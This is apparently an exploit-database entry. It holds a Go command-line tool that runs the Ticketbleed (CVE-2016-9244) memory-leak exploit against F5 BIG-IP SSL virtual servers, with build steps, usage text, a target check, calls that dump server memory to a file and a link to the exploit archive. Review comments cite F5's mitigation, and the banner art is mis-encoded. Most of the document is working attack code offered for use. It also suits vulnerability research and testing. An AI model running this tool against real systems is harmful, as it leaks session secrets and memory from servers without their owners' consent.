"F5 BIG-IP SSL Virtual Server - 'Ticketbleed' Memory Disclosure"

Author


"Ege Balci"

Platform


hardware

Release date


2017-02-10

/*
# Exploit Title: [Ticketbleed (CVE-2016-9244) F5 BIG-IP SSL virtual server Memory Leakage]
# Date: [10.02.2017]
# Exploit Author: [Ege Balcı]
# Vendor Homepage: [https://f5.com/]
# Version: [12.0.0 - 12.1.2 && 11.4.0 - 11.6.1]
# Tested on: [Multiple]
# CVE : [CVE-2016-9244]




BUILD:
	go get github.com/EgeBalci/Ticketbleed
	go build Ticketbleed.go

USAGE:
	./ticketbleed <options> <ip:port>
OPTIONS:
	-o, --out 	Output filename for raw memory
	-s, --size 	Size in bytes to read
	-h, --help 	Print this message

*/
package main

import "github.com/EgeBalci/Ticketbleed"
import "strconv"
import "strings"
import "fmt"
import "os"


// Command-line settings; main fills these in while scanning its arguments.
var (
	// OutputFile is the value that follows -o/--out. It stays empty when the
	// option is not given, in which case main creates no file.
	OutputFile = ""

	// BleedSize is the value that follows -s/--size. main hands half of it to
	// each of its two Ticketbleed.Exploit calls.
	BleedSize = 0
)

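// main parses the command line, asks Ticketbleed.Check about the target and,
// only when the returned status contains "[+]", calls Ticketbleed.Exploit.
//
// The target (<ip:port>) is always taken from the first argument, so options
// have to follow it, as the usage text in Help shows. Between one and five
// arguments are accepted; anything else prints Help and exits with status 1.
//
// Context for readers assessing exposure: the file header names
// CVE-2016-9244 and the affected BIG-IP version ranges. F5's advisory for that
// CVE gives disabling Session Tickets on the Client SSL profile as the
// mitigation and upgrading to a fixed release as the remedy.
func main() {
	args := os.Args[1:]
	if len(args) < 1 || len(args) > 5 {
		fmt.Println(Help)
		os.Exit(1)
	}

	for i := 0; i < len(args); i++ {
		switch args[i] {
		case "-h", "--help":
			fmt.Println(Help)
			os.Exit(1)

		case "-o", "--out":
			// An option given as the last argument has no value; reading
			// args[i+1] would panic with an index-out-of-range error.
			if i+1 >= len(args) {
				fmt.Println(Help)
				os.Exit(1)
			}
			OutputFile = args[i+1]

		case "-s", "--size":
			// Same guard as for --out: the value must actually be present.
			if i+1 >= len(args) {
				fmt.Println(Help)
				os.Exit(1)
			}
			size, err := strconv.Atoi(args[i+1])
			if err != nil {
				fmt.Println("[-] ERROR: Invalid size value !")
				os.Exit(1)
			}
			if size < 0 {
				fmt.Println("[-] ERROR: Size can't be smaller than 0")
				os.Exit(1)
			}
			BleedSize = size
		}
	}

	if OutputFile != "" {
		// os.Create truncates an existing file of the same name. The file is
		// only created and closed here; Exploit receives the name, not the handle.
		file, err := os.Create(OutputFile)
		if err != nil {
			fmt.Println("[-] ERROR: While creating output file !")
			os.Exit(1)
		}
		file.Close()
		fmt.Println("[*] Output file: " + OutputFile)
	}

	// Check the target first; nothing else runs unless the status is positive.
	status := Ticketbleed.Check(args[0])
	fmt.Println(status)
	if strings.Contains(status, "[+]") {
		// The author runs two calls side by side, each with half of BleedSize,
		// stating that a single caller gets many duplicate values echoed back.
		// NOTE(review): main does not wait for the goroutine, so the process
		// ends as soon as the second, synchronous call returns.
		go Ticketbleed.Exploit(args[0], OutputFile, BleedSize/2)
		Ticketbleed.Exploit(args[0], OutputFile, BleedSize/2)
	}
}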



// Help is the banner and usage text that main prints for -h/--help and when
// the argument count is outside the accepted range.
// NOTE(review): the banner art looks mis-encoded in this copy (probably block
// characters read with the wrong charset); it is runtime text and is left
// untouched here.
var Help string = `
â–„â–„â–„âˆâˆâˆâˆâˆâ–“ âˆâˆâ–“ â–„âˆâˆâˆâˆâ–„   âˆâˆ â–„âˆâ–€â–“âˆâˆâˆâˆâˆâ–„â–„â–„âˆâˆâˆâˆâˆâ–“ â–„â–„â–„â–„    âˆâˆâ–“    â–“âˆâˆâˆâˆâˆ â–“âˆâˆâˆâˆâˆ â–“âˆâˆâˆâˆâˆâ–„ 
â–“  âˆâˆâ–’ â–“â–’â–“âˆâˆâ–’â–’âˆâˆâ–€ ▀∠  âˆâˆâ–„âˆâ–’ ▓∠  ▀▓  âˆâˆâ–’ â–“â–’â–“âˆâˆâˆâˆâˆâ–„ â–“âˆâˆâ–’    ▓∠  â–€ ▓∠  â–€ â–’âˆâˆâ–€ âˆâˆâŒ
â–’ â–“âˆâˆâ–‘ â–’â–‘â–’âˆâˆâ–’▒▓∠   â–„ â–“âˆâˆâˆâ–„â–‘ â–’âˆâˆâˆ  â–’ â–“âˆâˆâ–‘ â–’â–‘â–’âˆâˆâ–’ â–„âˆâˆâ–’âˆâˆâ–‘    â–’âˆâˆâˆ   â–’âˆâˆâˆ   â–‘âˆâˆ   âˆâŒ
â–‘ â–“âˆâˆâ–“ â–‘ â–‘âˆâˆâ–‘â–’â–“â–“â–„ â–„âˆâˆâ–’â–“âˆâˆ âˆâ–„ ▒▓∠ â–„â–‘ â–“âˆâˆâ–“ â–‘ â–’âˆâˆâ–‘âˆâ–€  â–’âˆâˆâ–‘    ▒▓∠ â–„ ▒▓∠ â–„ â–‘â–“âˆâ–„   âŒ
  â–’âˆâˆâ–’ â–‘ â–‘âˆâˆâ–‘â–’ â–“âˆâˆâˆâ–€ â–‘â–’âˆâˆâ–’ âˆâ–„â–‘â–’âˆâˆâˆâˆâ–’ â–’âˆâˆâ–’ â–‘ ░▓∠ â–€âˆâ–“â–‘âˆâˆâˆâˆâˆâˆâ–’â–‘â–’âˆâˆâˆâˆâ–’â–‘â–’âˆâˆâˆâˆâ–’â–‘â–’âˆâˆâˆâˆâ–“ 
  â–’ â–‘â–‘   â–‘â–“  â–‘ â–‘â–’ â–’  â–‘â–’ â–’â–’ â–“â–’â–‘â–‘ â–’â–‘ â–‘ â–’ â–‘â–‘   â–‘â–’â–“âˆâˆâˆâ–€â–’â–‘ â–’â–‘â–“  â–‘â–‘â–‘ â–’â–‘ â–‘â–‘â–‘ â–’â–‘ â–‘ â–’â–’â–“  â–’ 
    â–‘     â–’ â–‘  â–‘  â–’   â–‘ â–‘â–’ â–’â–‘ â–‘ â–‘  â–‘   â–‘    â–’â–‘â–’   â–‘ â–‘ â–‘ â–’  â–‘ â–‘ â–‘  â–‘ â–‘ â–‘  â–‘ â–‘ â–’  â–’ 
  â–‘       â–’ â–‘â–‘        â–‘ â–‘â–‘ â–‘    â–‘    â–‘       â–‘    â–‘   â–‘ â–‘      â–‘      â–‘    â–‘ â–‘  â–‘ 
          â–‘  â–‘ â–‘      â–‘  â–‘      â–‘  â–‘         â–‘          â–‘  â–‘   â–‘  â–‘   â–‘  â–‘   â–‘    
             â–‘                                    â–‘                        â–‘      

Author: Ege Balci
Github: github.com/EgeBalci


USAGE: 
	./ticketbleed <ip:port> <options> 
OPTIONS:
	-o, --out 	Output filename for raw memory
	-s, --size 	Size in bytes to read
	-h, --help 	Print this message
`

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41298.zip